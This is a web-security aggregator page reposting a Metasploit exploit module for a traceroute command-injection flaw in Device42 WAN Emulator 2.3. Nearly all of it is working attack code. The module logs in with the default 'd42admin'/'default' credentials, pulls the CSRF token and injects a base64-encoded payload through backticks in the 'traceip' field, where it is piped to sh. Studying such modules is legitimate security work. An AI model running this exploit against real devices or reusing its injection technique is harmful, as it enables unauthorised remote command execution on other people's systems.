HackDig : Dig high-quality web security articles for hacker

Device42 WAN Emulator 2.3 Traceroute Command Injection

2014-11-26 23:20
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'WAN Emulator v2.3 Command Execution',
'Description' => %q{
},
'License' => MSF_LICENSE,
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Author' =>
[
'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit
],
'References' =>
[
],
'Payload' =>
{
'Space' => 1024,
'BadChars' => "",
'DisableNops' => true,
#'Compat' =>
# {
# 'PayloadType' => 'cmd',
# 'RequiredCmd' => 'generic netcat netcat-e',
# }
},
'DefaultOptions' =>
{
'ExitFunction' => 'none'
},
'Targets' =>
[
['Automatic Targeting', { 'auto' => true }]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 12 2012'
))
end

def exploit
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
})

cookie = res.headers['Set-Cookie']

csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' /></div>/

post = {
'csrfmiddlewaretoken' => csrf,
'username' => 'd42admin',
'password' => 'default',
'next' => '/'
}

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'accounts', 'login/'),
'vars_post' => post,
'method' => 'POST',
'cookie' => cookie
})

unless res.code == 302
fail_with("auth failed")
end

cookie = res.headers['Set-Cookie']

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ping/'),
'cookie' => cookie
})

cookie = res.headers['Set-Cookie']
csrf = $1 if res.body =~ / name='csrfmiddlewaretoken' value='(.*)' /></div>/

post = {
'csrfmiddlewaretoken' => csrf,
'traceip' => "www.google.com`echo #{Rex::Text.encode_base64(payload.encoded)}|base64 --decode|sh`",
'trace' => ''
}

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'ping/'),
'method' => "POST",
'vars_post' => post,
'cookie' => cookie
})
end
end




Source: 38353/stiolpxe/moc.bd-tiolpxe.www

Read:2473 | Comments:0 | Tags:webapps

“Device42 WAN Emulator 2.3 Traceroute Command Injection”0 Comments

Submit A Comment

Name:

Email:

Blog :

Verification Code:

Announce

Share high-quality web security related articles with you:)

Tools

Tag Cloud